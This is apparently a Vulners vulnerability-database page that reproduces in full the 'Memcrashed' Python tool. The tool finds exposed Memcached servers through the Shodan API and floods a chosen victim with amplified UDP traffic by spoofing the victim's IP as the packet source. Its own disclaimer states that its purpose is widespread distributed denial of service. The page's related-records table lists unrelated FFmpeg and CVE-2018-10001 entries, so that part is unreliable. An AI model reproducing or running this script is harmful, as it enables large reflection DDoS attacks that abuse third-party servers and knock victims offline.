Vulners
Lucene search
Memcached 1.5.5 - Memcrashed Insufficient Control of Network Message Volume Denial of Service
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | CVE-2018-10001 | 11 Apr 201803:00 | – | alpinelinux |
 | Ffmpeg Denial of Service Vulnerability (CNVD-2018-08557) | 11 Apr 201800:00 | – | cnvd |
 | CVE-2018-10001 | 11 Apr 201803:00 | – | cve |
 | CVE-2018-10001 | 11 Apr 201803:00 | – | cvelist |
 | [SECURITY] [DSA 4249-1] ffmpeg security update | 17 Jul 201820:41 | – | debian |
 | CVE-2018-10001 | 11 Apr 201803:00 | – | debiancve |
 | Debian DSA-4249-1 : ffmpeg - security update | 18 Jul 201800:00 | – | nessus |
| GLSA-202003-65 : FFmpeg: Multiple vulnerabilities | 31 Mar 202000:00 | – | nessus |
 | EUVD-2018-2085 | 7 Oct 202500:30 | – | euvd |
 | FFmpeg: Multiple vulnerabilities | 30 Mar 202000:00 | – | gentoo |
10
Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API
#-- coding: utf8 --
#!/usr/bin/python
# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44265.zip
import sys, os, time, shodan
from pathlib import Path
from scapy.all import *
from contextlib import contextmanager
starttime=time.time()
@contextmanager
def suppress_stdout():
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
class color:
HEADER = '\033[0m'
keys = Path("./api.txt")
logo = color.HEADER + '''
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
Author: @037
Version: 3.1
####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
| memcached servers. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
'''
print(logo)
if keys.is_file():
with open('api.txt', 'r') as file:
SHODAN_API_KEY=file.readlines()
else:
file = open('api.txt', 'w')
SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')
file.write(SHODAN_API_KEY)
print('[~] File written: ./api.txt')
file.close()
while True:
api = shodan.Shodan(SHODAN_API_KEY)
print('')
try:
myresults = Path("./bots.txt")
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
if query.startswith('y'):
print('')
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
results = api.search('product:"Memcached" port:11211')
print('[✓] API Key Authentication: SUCCESS')
print('[~] Number of bots: %s' % results['total'])
print('')
saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
if saveresult.startswith('y'):
file2 = open('bots.txt', 'a')
for result in results['matches']:
file2.write(result['ip_str'] + "\n")
print('[~] File written: ./bots.txt')
print('')
file2.close()
saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()
if myresults.is_file():
if saveme.startswith('y'):
ip_arrayn = []
with open('bots.txt') as my_file:
for line in my_file:
ip_arrayn.append(line)
ip_array = [s.rstrip() for s in ip_arrayn]
else:
print('')
print('[✘] Error: No bots stored locally, bots.txt file not found!')
print('')
if saveme.startswith('y') or query.startswith('y'):
print('')
target = input("[▸] Enter target IP address: ")
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
print('')
if query.startswith('y'):
iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()
if iplist.startswith('y'):
print('')
counter= int(0)
for result in results['matches']:
host = api.host('%s' % result['ip_str'])
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
if saveme.startswith('y'):
iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()
if iplistlocal.startswith('y'):
print('')
counter= int(0)
for x in ip_array:
host = api.host('%s' % x)
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
print('')
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
if engage.startswith('y'):
if saveme.startswith('y'):
for i in ip_array:
if power>1:
print('[+] Sending %d forged UDP packets to: %s' % (power, i))
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[+] Sending 1 forged UDP packet to: %s' % i)
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
else:
for result in results['matches']:
if power>1:
print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
print('')
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
break
else:
print('')
print('[✘] Error: %s not engaged!' % target)
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[✘] Error: No bots stored locally or remotely on Shodan!')
print('[~] Restarting Platform! Please wait.')
print('')
except shodan.APIError as e:
print('[✘] Error: %s' % e)
option = input('[*] Would you like to change API Key? <Y/n>: ').lower()
if option.startswith('y'):
file = open('api.txt', 'w')
SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ')
file.write(SHODAN_API_KEY)
print('[~] File written: ./api.txt')
file.close()
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[•] Exiting Platform. Have a wonderful day.')
break
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2018 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.00708